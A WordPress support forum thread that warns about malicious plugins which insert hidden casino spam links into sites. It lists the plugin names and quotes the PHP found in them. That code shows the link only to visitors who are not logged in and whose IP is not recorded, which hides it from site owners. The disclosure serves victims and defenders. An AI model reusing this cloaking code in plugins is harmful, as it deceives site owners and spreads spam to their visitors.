maggot399

You weren’t hacked, it was from a plugin you installed. See this post for more information;

https://www.ads-software.com/support/topic/my-site-deface-link-integrated-on-my-homepage

Actually all the others on the list have already been dealt with so I see WordPress do have a lot of moderators here that seem to do a great job in protecting other WordPress users.

The issue is however, there’s no doubt other plugins live right now, created by the same spammer, that we don’t know about. When they create a new plugin it ‘survives’ for a few weeks without being detected, which is enough for a good few hundred sites to get infected. Once you install one of the dodgy plugins created by this spammer it hard to even notice you have a problem, because of the way it deceptively hides the link to the site owner.

Also many thousands of sites remain infected right now by the plugins I listed above, even though they were removed quite quickly.

Is there anyway for WordPress to email users that have installed a plugin after it gets removed for reasons like this? I take it once WordPress is installed on their own domain there’s no connection between WordPress servers and the site owner?

See these links for more information
https://www.ads-software.com/support/topic/strange-link-to-casino-online-appeared-at-the-top-of-my-blog
https://www.ads-software.com/support/topic/random-casino-link-has-appeared-on-my-wordpress-site

To see just how widespread he problem is just type in one of the spammy domains into Google and see just how many thousands are displaying the link on their blog. (couple of the links are in the links I provided above).

Thanks

Actually no one hacked into your site the way you might think – the spam links are created by a malicious WordPress plugins you downloaded directly from www.ads-software.com. The spammer just keeps creating new plugins after they get banned. Defintely a flaw in the way WordPress offer plugins to users…

The following plugins are known to be linked to the spammer;

seo-cheese
return-to-top
g-translate (note the hyphen – other versions are fine)
seo-interlinking
google-maps-by-daniel-martyn

If you have installed any of these plugins they should be removed immediately as they are all produced by the same hacker. They all insert dodgy links into the top of your site.

Malicious code (this is normally found in setup.php or install.php)

<?php
if (is_user_logged_in()) { $loggedin = 'yes'; } else { $loggedin = 'no'; }
if ($loggedin == 'no') {
$ip = $_SERVER['REMOTE_ADDR'];
$filename = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/seo-cheese/created.txt';
$handle = fopen($filename, "r");
$contents = fread($handle, filesize($filename));
fclose($handle);
$filestring= $contents;
$findme  = $ip;
$pos = strpos($filestring, $findme);
if ($pos === false) {
?>
<p align="center"><a href="https://online-casino.blog.ca">https://online-casino.blog.ca</a></p>
<?php //
} else {
echo '';
}}
?>

The following sites are linked to the same hacker and listing them here will hopefully help other people who have the same issue.

[ Thanks but please do not post spammy links like that on these forums ]

The trick works well because the link itself is not visible to the site owner as firstly, it doesn’t show if you are logged in to your own site, and secondly it also keeps a log of all past IP addresses that successfully logged in before and hides the link to any recorded IP addresses.